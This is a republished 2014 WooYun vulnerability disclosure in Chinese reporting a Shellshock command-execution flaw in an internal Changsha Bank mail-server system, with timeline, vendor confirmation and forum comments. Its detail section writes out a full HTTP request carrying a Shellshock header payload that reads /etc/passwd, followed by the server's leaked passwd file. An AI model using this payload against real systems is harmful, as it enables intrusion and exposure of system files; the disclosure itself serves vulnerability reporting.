长沙银行某系统命令执行漏洞

admin
admin
admin
140350
文章
117
评论
2015年7月7日12:11:322418 views字数 242阅读0分48秒阅读模式
摘要

2014-10-13: 细节已通知厂商并且等待厂商处理中
2014-10-15: 厂商已经确认,细节仅向厂商公开
2014-10-25: 细节向核心白帽子及相关领域专家公开
2014-11-04: 细节向普通白帽子公开
2014-11-14: 细节向实习白帽子公开
2014-11-25: 细节向公众公开

漏洞概要 关注数(17) 关注此漏洞

缺陷编号: WooYun-2014-78919

漏洞标题: 长沙银行某系统命令执行漏洞

相关厂商: 长沙银行

漏洞作者: 拖鞋王子

提交时间: 2014-10-13 00:18

公开时间: 2014-11-25 00:22

漏洞类型: 系统/服务运维配置不当

危害等级: 高

自评Rank: 15

漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 第三方不可信程序 安全意识不足 安全意识不足

1人收藏

漏洞详情

披露状态:

2014-10-13: 细节已通知厂商并且等待厂商处理中
2014-10-15: 厂商已经确认,细节仅向厂商公开
2014-10-25: 细节向核心白帽子及相关领域专家公开
2014-11-04: 细节向普通白帽子公开
2014-11-14: 细节向实习白帽子公开
2014-11-25: 细节向公众公开

简要描述:

用神器一看今天发现长沙银行某重要内部系统依旧命令执行

详细说明:

code 区域 
GET /cgi-bin/madmin.cgi HTTP/1.1
 Host: **.**.**.**
 Proxy-Connection: keep-alive
 Cache-Control: max-age=0
 X-Test: () { :;};a=`/bin/cat /etc/passwd`;echo $a
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
 Accept-Encoding: gzip,deflate,sdch
 Accept-Language: en,zh-CN;q=0.8,zh;q=0.6,ko;q=0.4,zh-TW;q=0.2,th;q=0.2,ja;q=0.2

漏洞证明:

code 区域 
HTTP/1.1 200 OK
 Date: Fri, 10 Oct 2014 15:42:40 GMT
 Server: Mirapoint/4.4.3-GA
 root: x:0:0:root:/root:/bin/bash
 bin: x:1:1:bin:/bin:/sbin/nologin
 daemon: x:2:2:daemon:/sbin:/sbin/nologin
 adm: x:3:4:adm:/var/adm:/sbin/nologin
 lp: x:4:7:lp:/var/spool/lpd:/sbin/nologin
 sync: x:5:0:sync:/sbin:/bin/sync
 shutdown: x:6:0:shutdown:/sbin:/sbin/shutdown
 halt: x:7:0:halt:/sbin:/sbin/halt
 mail: x:8:12:mail:/var/spool/mail:/sbin/nologin
 news: x:9:13:news:/etc/news:
 uucp: x:10:14:uucp:/var/spool/uucp:/sbin/nologin
 operator: x:11:0:operator:/root:/sbin/nologin
 games: x:12:100:games:/usr/games:/sbin/nologin
 gopher: x:13:30:gopher:/var/gopher:/sbin/nologin
 ftp: x:14:50:FTP User:/var/ftp:/sbin/nologin
 nobody: x:99:99:Nobody:/:/sbin/nologin
 vcsa: x:69:69:virtual console memory owner:/dev:/sbin/nologin
 monit: x:100:101:monit daemon:/var/lib/monit:/bin/sh
 pcap: x:77:77::/var/arpwatch:/sbin/nologin
 nscd: x:28:28:NSCD Daemon:/:/sbin/nologin
 ntp: x:38:38::/etc/ntp:/sbin/nologin
 dbus: x:81:81:System message bus:/:/sbin/nologin
 rpc: x:32:32:Portmapper RPC user:/:/sbin/nologin
 named: x:25:25:Named:/var/named:/sbin/nologin
 sshd: x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
 memcached: x:101:102:Memcached daemon:/var/run/memcached:/sbin/nologin
 oprofile: x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
 haldaemon: x:68:68:HAL daemon:/:/sbin/nologin
 rpcuser: x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
 nfsnobody: x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
 man: x:500:15::/home/man:/bin/bash
 mira: x:70:70::/home/mira:/bin/bash
 netdump: x:34:34::/home/netdump:/bin/bash
 cyrus: x:70:70::/home/cyrus:/bin/bash
 Cache-Control: no-cache
 Pragma: no-cache
 Keep-Alive: timeout=15, max=100
 Connection: Keep-Alive
 Content-Type: text/html; charset=GB2312
 
 <html>
 <head>
 <meta http-equiv='Content-Type' content='text/html; charset=GB2312'>
 <META HTTP-EQUIV='Expires' CONTENT='Tue, 04 Dec 1993 21:29:02 GMT'>
 <META HTTP-EQUIV='Pragma' CONTENT='no-cache'>
 <LINK REL=STYLESHEET TYPE='text/css' HREF='/extras/css/admin.css'>
 <LINK REL='SHORTCUT ICON' href='/sa/Mira_bookmark.ico'>
 
 <title>Óʼþ·þÎñÆ÷µÇ¼</title>
 <script language=javascript src='/sa/sa.js'>
 </script>
 </head>
 <body class='genLogin' onload='document.forms[0].elements[0].focus()' text='#000000' bgcolor='#efefef' leftmargin='0' topmargin='0'>
 <center>
 <table border='0' cellpadding='8' cellspacing='0' background='/sa/globe_full.gif' width=800>
   <tr> 
     <td width='230' align=center valign=bottom>&nbsp;</td>
     <td width='400' height='108' align=center valign=bottom>&nbsp;</td>
     <td align=center valign=bottom>&nbsp;</td>
   </tr>
   <tr align='left'> 
     <td colspan='3' valign=bottom> 
       <table width='545' border='0' cellspacing='0' cellpadding='0'>
         <tr>
           <td width='201'>&nbsp;</td>
           <td width='338'>
      <table width='334' height='81' border='0' cellpadding='0' cellspacing='0'>
        <tr><td>&nbsp;</td></tr>
             </table>
    </td>
         </tr>
         <tr> 
            <td colspan=2 nowrap align=right>
       <font class='genLoginTitle' color='#f5873c'><strong>Óʼþ·þÎñÆ÷µÇ¼</strong></font>
     </td>
          </tr>
       </table>
     </td>
   </tr>
   <tr>
     <td width='230' align=center>&nbsp;</td>
     <td align='left' colspan='2'>
       <form ACTION='/cgi-bin/madmin.cgi/sa/login.html' NAME='myform' AutoComplete='off' 
             METHOD='POST' ENCTYPE='application/x-www-form-urlencoded' onSubmit='checkjavascript(myform.browserjs);'>
       <table cellspacing=0 cellpadding=0 width=160 bgcolor=#ffffff border=0>
  <tr> 
           <td colspan='2' rowspan='2' align='left' valign='top' bgcolor='efefef'><img src='/sa/lefttopgrey.gif' width='12' height='12'></td>
           <td height=1 valign=top bgcolor='#cccccc'><img height=1 alt='' src='/sa/ts.gif' width=1 border=0></td>
           <td colspan='2' rowspan='2' align='right' valign='top' bgcolor='efefef'><img src='/sa/righttopgrey.gif' width='12' height='12'></td>
  </tr>
         <tr> 
           <td height=11 valign=top bgcolor='#ffffff'></td>
         </tr>
         <tr> 
           <td width=1 bgcolor=#cccccc><img height=1 alt='' src='/sa/ts.gif' width=1 border=0></td>
           <td width=11 bgcolor=#ffffff>&nbsp;</td>
           <td align='center' valign=top>
      <table cellspacing=0 border=0>
               <tr>
          <td colspan='2' align='right' nowrap>
            <font class=text1>±ê×¼Á¬½Ó | <a href='https://**.**.**.**/cgi-bin/madmin.cgi/sa?locale=zs_CN.utf-8L4_3'>°²È«Á¬½Ó</a></font>
          </td>
               </tr>
               <tr>
          <td align='right' nowrap>
     Óû§£º
   </td>
          <td>
     <input type='text' size='20' name='user' value='' tabindex=1 onkeypress='checkWhich(event, login)'>
   </td>
               </tr>
               <tr>
          <td align='right' nowrap>
     ÃÜÂ룺
   </td>
          <td>
     <input type='password' size='20' name='password' value='' tabindex=2 onkeypress='checkWhich(event, login)'>
   </td>
               </tr>
               <tr>
          <td>
     &nbsp;
   </td>
          <td align='right'>
     <input type='submit' name='login' value='怬' tabindex=3 class='btn'>
   </td>
               </tr>
             </table>
    </td>
           <td width=11 bgcolor=#ffffff><img height=1 alt=''  src='/sa/ts.gif' width=1 border=0></td>
           <td width=1 bgcolor=#cccccc></td>
         </tr>
         <tr> 
           <td colspan='2' rowspan='2' align='left' valign='top' bgcolor='efefef'><img src='/sa/leftbotgrey.gif' width='12' height='12'></td>
           <td height='11' valign=top bgcolor='#ffffff'><img height=1 alt='' src='/sa/ts.gif' width=1 border=0></td>
           <td colspan='2' rowspan='2' align='right' valign='top' bgcolor='efefef'><img src='/sa/rightbotgrey.gif' width='12' height='12'></td>
         </tr>
         <tr> 
           <td height='1' valign=top bgcolor='#cccccc'></td>
         </tr>
       </table>
       <input type='hidden' name='timestamp' value='1412955760'>
       <input type='hidden' name='locale' value='zs_CN.utf-8L4_3'>
       <input type='hidden' name='browserjs' value='false'>
       <input type='hidden' name='mutual_lock' value=''>
       </form>
     </td>
   </tr>
   <tr> 
     <td height='65' colspan='3'>
       &nbsp;
     </td>
   </tr>
   <tr>
     <td>&nbsp;</td>
     <td colspan='2' align='left'>
       <font class=text1><B>µÇ¼</B>£º <span class='genDataHilite' color='#ff0000'>Óʼþ·þÎñÆ÷δ¾­Ðí¿É</span> &nbsp;</font>
     </td>
   </tr>
   <tr>
     <td>&nbsp;</td>
     <td colspan='2' align='left'>
             
 <a href='/cgi-bin/madmin.cgi/sa/login.html?locale=en_US.ISO_8859-1'>
   <nobr>Ó¢Óï</nobr></a> - 
 <a href='/cgi-bin/madmin.cgi/sa/login.html?locale=ja_JP.utf-8'>
   <nobr>ÈÕÓï</nobr></a> - 
 <a name='/cgi-bin/madmin.cgi/sa/login.html?locale=zs_CN.utf-8L4_3'>
   <nobr>¼òÌåÖÐÎÄ</nobr></a>
     </td>
   </tr>
   <tr>
     <td>&nbsp;</td>
     <td colspan='2' align='left'>
       <font class=text1></font>
     </td>
   </tr>
 </table>
 </center>
 </body>
 </html>

修复方案:

版权声明:转载请注明来源 拖鞋王子@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2014-10-15 17:40

厂商回复:

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 2014-10-11 01:01 | 袋鼠妈妈 ( 普通白帽子 | Rank:449 漏洞数:61 | 故乡的原风景.MP3)

    0

    http://loudong.360.cn/vul/info/id/25287 http://loudong.360.cn/vul/info/id/25284 不知道是不是一样的....@xsser @疯狗

  2. 2014-10-11 08:18 | U神 ( 核心白帽子 | Rank:1375 漏洞数:152 | 乌云核心菜鸟,此号处于联盟托管中....)

    0

    @袋鼠妈妈 是一样的

  3. 2014-10-11 09:28 | 氓氓童鞋 ( 普通白帽子 | Rank:374 漏洞数:65 )

    0

    @袋鼠妈妈 @U神 好多都是两个平台都发一遍。。。。这风气

  4. 2014-10-11 12:37 | 红客十年 ( 普通白帽子 | Rank:392 漏洞数:80 | 去年离职富士康,回到家中上蓝翔,蓝翔毕业...)

    0

    扔完库带仍乌云………这真特么的机制……

  5. 2014-10-11 12:44 | 袋鼠妈妈 ( 普通白帽子 | Rank:449 漏洞数:61 | 故乡的原风景.MP3)

    0

    @红客十年 因为裤带会查是否重复...wooyun不会 哈哈

  6. 2014-10-11 12:54 | scanf ( 核心白帽子 | Rank:1694 漏洞数:237 | 。)

    1

    会不会封id啊?

  7. 2014-10-11 13:38 | 老笨蛋 ( 路人 | Rank:29 漏洞数:8 | 老笨蛋一个)

    1

    我只是进来看看的。

  8. 2014-10-11 15:11 | 黑吃黑 ( 普通白帽子 | Rank:165 漏洞数:32 | 不是因为看到了希望才去努力,而是努力了才...)

    0

    裤带的不是不公开看吗

  9. 2014-10-11 17:41 | 贫道来自河北 ( 普通白帽子 | Rank:1469 漏洞数:439 | 一个立志要把乌云集市变成零食店的男人)

    0

    小伙子,不带你这么玩的啊

  10. 2014-10-11 23:22 | Murk Emissary ( 实习白帽子 | Rank:74 漏洞数:14 | 低调做人 低调行事)

    0

    小伙子,不带你这么玩的啊

  11. 2014-11-28 08:03 | 老妖 ( 路人 | Rank:22 漏洞数:3 )

    1

    神器是啥?

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin